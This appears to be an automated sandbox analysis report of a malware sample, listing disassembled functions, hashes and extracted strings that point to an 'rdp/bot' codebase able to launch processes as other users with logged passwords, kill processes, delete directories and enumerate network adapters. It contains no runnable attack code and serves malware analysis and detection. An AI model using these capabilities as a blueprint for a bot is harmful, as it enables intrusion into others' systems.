                    • Instruction ID: 42503d3eec102efb5485b9cb306c0d88a7697186eca431e0569ea61cf4bacc54
                    • Opcode Fuzzy Hash: 979f6ab677c7687cb865241237432280adb0046b4e29c36f948d58921f5010c4
                    • Instruction Fuzzy Hash: 5B018621A2C64782F7A0B654EC58BB9E1A19F84384F940030D60E4B6D5DF7CD9A5C76C
                    Function 00007FF70887299E Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$Heap$FreeProcessfclosefread
                    • String ID:
                    • API String ID: 4240746492-0
                    • Opcode ID: 06b5753a0f2153fadecf8515356ede5123c149dc1559c95b793d2786b5db2776
                    • Instruction ID: 4f1bf4da1ef7500bc016ab6d28168ec8b1074fd4a039d5bebafc733a5b9c1dbb
                    • Opcode Fuzzy Hash: 06b5753a0f2153fadecf8515356ede5123c149dc1559c95b793d2786b5db2776
                    • Instruction Fuzzy Hash: B2E04801B3825301FE74E9691D40F75C5B12F59798F5A14308D0F566E9DF3DE8D15828
                    Function 00007FF708872997 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$Heap$FreeProcessfclosefread
                    • String ID:
                    • API String ID: 4240746492-0
                    • Opcode ID: 5eb821edd3b4ac3d11fb5a8a8cf5f479bd344658574371c11ea2e3b3b9955ca5
                    • Instruction ID: a3708d60a38eff19bd0b99a0d506839cfcbc0c55b77baf3b3e6cc0e2ecec3955
                    • Opcode Fuzzy Hash: 5eb821edd3b4ac3d11fb5a8a8cf5f479bd344658574371c11ea2e3b3b9955ca5
                    • Instruction Fuzzy Hash: A9E04801B3825301FE74E9695D40F75C5B12F59798F5A14308D0F566E9DF3DE8D15828
                    Function 00007FF7088729FE Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$Heap$FreeProcessfclosefread
                    • String ID:
                    • API String ID: 4240746492-0
                    • Opcode ID: eca8601a8072f10b742a6ea828dc9ef14cccec53e02c73ff1a62bffbaf347bab
                    • Instruction ID: 68ef91e92cc9ef862c984d52b9bd563a9b14a77c78ccece678873dd911b65409
                    • Opcode Fuzzy Hash: eca8601a8072f10b742a6ea828dc9ef14cccec53e02c73ff1a62bffbaf347bab
                    • Instruction Fuzzy Hash: 93E0D801B3814201FE70E9691D40F35C5B12F44798F5A14308D0F162EADF3DE8D10828
                    Function 00007FF708872989 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$Heap$FreeProcessfclosefread
                    • String ID:
                    • API String ID: 4240746492-0
                    • Opcode ID: 0f4c820b4593ff6fa6eb4d1d7b985b18c40b22b35b228e74236585271f35355d
                    • Instruction ID: 977957e8fe4b24355507415ca4a2630192d6375e44585db992cc92056388b40b
                    • Opcode Fuzzy Hash: 0f4c820b4593ff6fa6eb4d1d7b985b18c40b22b35b228e74236585271f35355d
                    • Instruction Fuzzy Hash: E1E04801B3825305FE74E9691D40F75C5B12F59798F5A14308D0F566EAEF3DE8D15828
                    Function 00007FF708872990 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$Heap$FreeProcessfclosefread
                    • String ID:
                    • API String ID: 4240746492-0
                    • Opcode ID: 93779f5a2cdb3e04165489ec7973de93b07f8438cdc681d7751f1fbd96d9f5de
                    • Instruction ID: a1ab9fe0082c476625dc79765294fbc714d4f94a189762b761c58e28b07fb768
                    • Opcode Fuzzy Hash: 93779f5a2cdb3e04165489ec7973de93b07f8438cdc681d7751f1fbd96d9f5de
                    • Instruction Fuzzy Hash: E9E0D801B3825301FE70E9690D40F36C5B12F48798F5A14308C0F162EADF3DE8D10828
                    Function 00007FF708872982 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$Heap$FreeProcessfclosefread
                    • String ID:
                    • API String ID: 4240746492-0
                    • Opcode ID: d9839dda6aa00f83f1b280c0522c91c52a71f8d5d8a1992868c318b81a1566b1
                    • Instruction ID: 8e27d0f47083ca5342937888bdc9816e1a8cd118ddc3f775579bcbd26d6e9a0d
                    • Opcode Fuzzy Hash: d9839dda6aa00f83f1b280c0522c91c52a71f8d5d8a1992868c318b81a1566b1
                    • Instruction Fuzzy Hash: 6BE04801B3825301FE74E9694D40F75C5B13F59798F5A14308D0F566E9DF3DE4D15828
                    Function 00007FF7088781E0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: ServiceStatus
                    • String ID:
                    • API String ID: 3969395364-0
                    • Opcode ID: 4993fdc76b1177e06be1b464f55a433b82611d2e99cbe8385cbffbaa458d3ac6
                    • Instruction ID: b197ea03e40f75579a6d5dd0a79cf8e5f43d390f25677f54c6fe679161349bfd
                    • Opcode Fuzzy Hash: 4993fdc76b1177e06be1b464f55a433b82611d2e99cbe8385cbffbaa458d3ac6
                    • Instruction Fuzzy Hash: 56D06C74D6A602C6E708FF06EC85824E6B0BF89741BD09036D21C523A0DF3CA1B98B29
                    Function 00007FF7088776D2 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: rand_s
                    • String ID:
                    • API String ID: 863162693-0
                    • Opcode ID: 34b79ae6e1dd47e5b081b7fbe00c12fbd074ba990cf07bcb48e6a06ddf1fcfa5
                    • Instruction ID: 789e0f06264ee1530cfe59aeefb39008af00dd14ada936998c4d8cac42f24c5e
                    • Opcode Fuzzy Hash: 34b79ae6e1dd47e5b081b7fbe00c12fbd074ba990cf07bcb48e6a06ddf1fcfa5
                    • Instruction Fuzzy Hash: 79C00226A185408AD620EB25E845659A770FB98308FD04111E65D826A4CB3CD62ACF14
                    Function 00007FF8B9155A47 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: CriticalEnterSection
                    • String ID:
                    • API String ID: 1904992153-0
                    • Opcode ID: 7abd05a5a67c31e03c5b12fe05f629d692a795e69a910426a5662404033e003a
                    • Instruction ID: 3d5bc5f1e61b4b7914237302588f4b708a614d2a2b3fff146f4abbe661271ea4
                    • Opcode Fuzzy Hash: 7abd05a5a67c31e03c5b12fe05f629d692a795e69a910426a5662404033e003a
                    • Instruction Fuzzy Hash: 13C02B90F1828283FF08AF7ABCD203402209FDC780F001038DB5E43392CE2CA8D4A300

                    Non-executed Functions

                    Function 00007FF8BFB52CE8 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 129memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Heap$Process$AdaptersAllocInfo$Free
                    • String ID: (adapter_num != NULL)$(pref_adapter_type != NULL)$H:/Projects/rdp/bot/codebase/net.c$[D] (%s) -> Adapter detected(name=%s,desc=%s,type=%d)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetAdaptersInfo failed(res=%08lx)$[E] (%s) -> GetBestInterface failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$net_info
                    • API String ID: 2437369060-1325175688
                    • Opcode ID: 43c9ba1fab3bd22d021c8fc96399c174167b883a95ea790a58ad8f02497e1c4e
                    • Instruction ID: baf784a1c666d460c03a2a73f2976a077fff7dca1f888da68c15cc5039edb998
                    • Opcode Fuzzy Hash: 43c9ba1fab3bd22d021c8fc96399c174167b883a95ea790a58ad8f02497e1c4e
                    • Instruction Fuzzy Hash: 57516D61A0E647A5FF209FA8E8602B87360AF447C4F484036EB4E46E96EE7CF945C751
                    Function 00007FF8BFB55013 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                    • API String ID: 4253334766-243243391
                    • Opcode ID: abe8a7a0647bd4aa9e9a0bd68a63c99f469def4bf1afce3bbd9a4d46a30e68bb
                    • Instruction ID: f85100c00cb2d387547dd8cba60605f40d51d0e6ae767c5bbece8e6d4d36e547
                    • Opcode Fuzzy Hash: abe8a7a0647bd4aa9e9a0bd68a63c99f469def4bf1afce3bbd9a4d46a30e68bb
                    • Instruction Fuzzy Hash: 0E618462E0D643A1FB2067DCA820BBC63506F407DAF481132DB5E5B6D4DE6DF984C381
                    Function 00007FF8BFB55835 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: _errno$fclosefflushfopenfseekfwrite
                    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                    • API String ID: 2897271634-4162578512
                    • Opcode ID: b84cb803f0d82e5a755407c3bb328e7d1a9ae36471a638cfe8f5b2168b7d09e7
                    • Instruction ID: 01e3fd4aa707647cf8eb8d564d040fa1aeeb17ad2593fc09b669e6042328a2de
                    • Opcode Fuzzy Hash: b84cb803f0d82e5a755407c3bb328e7d1a9ae36471a638cfe8f5b2168b7d09e7
                    • Instruction Fuzzy Hash: 1BD18C62A08A47A2FA109FDDE850BBC7751AF547C9F556132DB0E572A1EF3CF5868300
                    Function 00007FF8BFB5B877 Relevance: 56.4, APIs: 17, Strings: 15, Instructions: 435stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: strlen$strcat$CloseErrorHandleLastLogonUser
                    • String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$H:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
                    • API String ID: 1842180197-931256089
                    • Opcode ID: 9ff7a7d4de6036aab2a8f988d88d184b2291c9b9729713fd49194e1af14634fd
                    • Instruction ID: c2bf1c46c1f901fe62d15cc92d9e90da49245ae6e1dba72526ecf16463b8d203
                    • Opcode Fuzzy Hash: 9ff7a7d4de6036aab2a8f988d88d184b2291c9b9729713fd49194e1af14634fd
                    • Instruction Fuzzy Hash: 75128BA1A0C68390FA708B99E4603B9B390FB457C4F488536DB4E477A4DF7CFA898740
                    Function 00007FF8BFB55FC9 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 226stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                    • String ID: (path != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                    • API String ID: 2460052984-812936415
                    • Opcode ID: 4a67401f6c1003bd3f7228ea85ce874602a4d826e684d437ded92f11e5711381
                    • Instruction ID: 768311b78771331b5cd556b6fef4d1800ba0ccaf7bbc694e0c7b4801f983f5d8
                    • Opcode Fuzzy Hash: 4a67401f6c1003bd3f7228ea85ce874602a4d826e684d437ded92f11e5711381
                    • Instruction Fuzzy Hash: 01A18F61A1C68295FA609B8DE5643BDB352AF813C4F940036DB4E47A95EE7CF449CB01
                    Function 00007FF8BFB5B08F Relevance: 42.4, APIs: 11, Strings: 13, Instructions: 418stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$Process$CloseHandleOpenTerminatestrcmp
                    • String ID: (name != NULL) || (pid != 0)$H:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|
                    • API String ID: 2412365107-3514367195
                    • Opcode ID: 7a145d920d44d550c8e711552fab0ea8ec7e2ebcb057eddcc5ff4a7c0fe10b63
                    • Instruction ID: 47ad04d0e0cf3d71fe9fd5a03962045e62851c3876aca31e7cd588efd021c714
                    • Opcode Fuzzy Hash: 7a145d920d44d550c8e711552fab0ea8ec7e2ebcb057eddcc5ff4a7c0fe10b63
                    • Instruction Fuzzy Hash: 16F11611E0C60792FFB556DCA8E137D63419F197D9F248036DB0E4A6D2EF6EBC859202
                    Function 00007FF8BFB570A1 Relevance: 36.9, APIs: 5, Strings: 16, Instructions: 199fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorFileLast$CloseCreateHandleLock
                    • String ID: $ $(lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$~$~
                    • API String ID: 2747014929-2799703827
                    • Opcode ID: c152d8475cbe2f7e9005828fa1b90468df26195785c27f23354a8c65972831bd
                    • Instruction ID: 1621bc4e419febc4f390324a3364352a2ef103a41d39c411b3597987eec75b3d
                    • Opcode Fuzzy Hash: c152d8475cbe2f7e9005828fa1b90468df26195785c27f23354a8c65972831bd
                    • Instruction Fuzzy Hash: C8813960B0C74F91FA64ABDDE8603B87351AF057E4F241232DB2E066D1EE6DB9859342
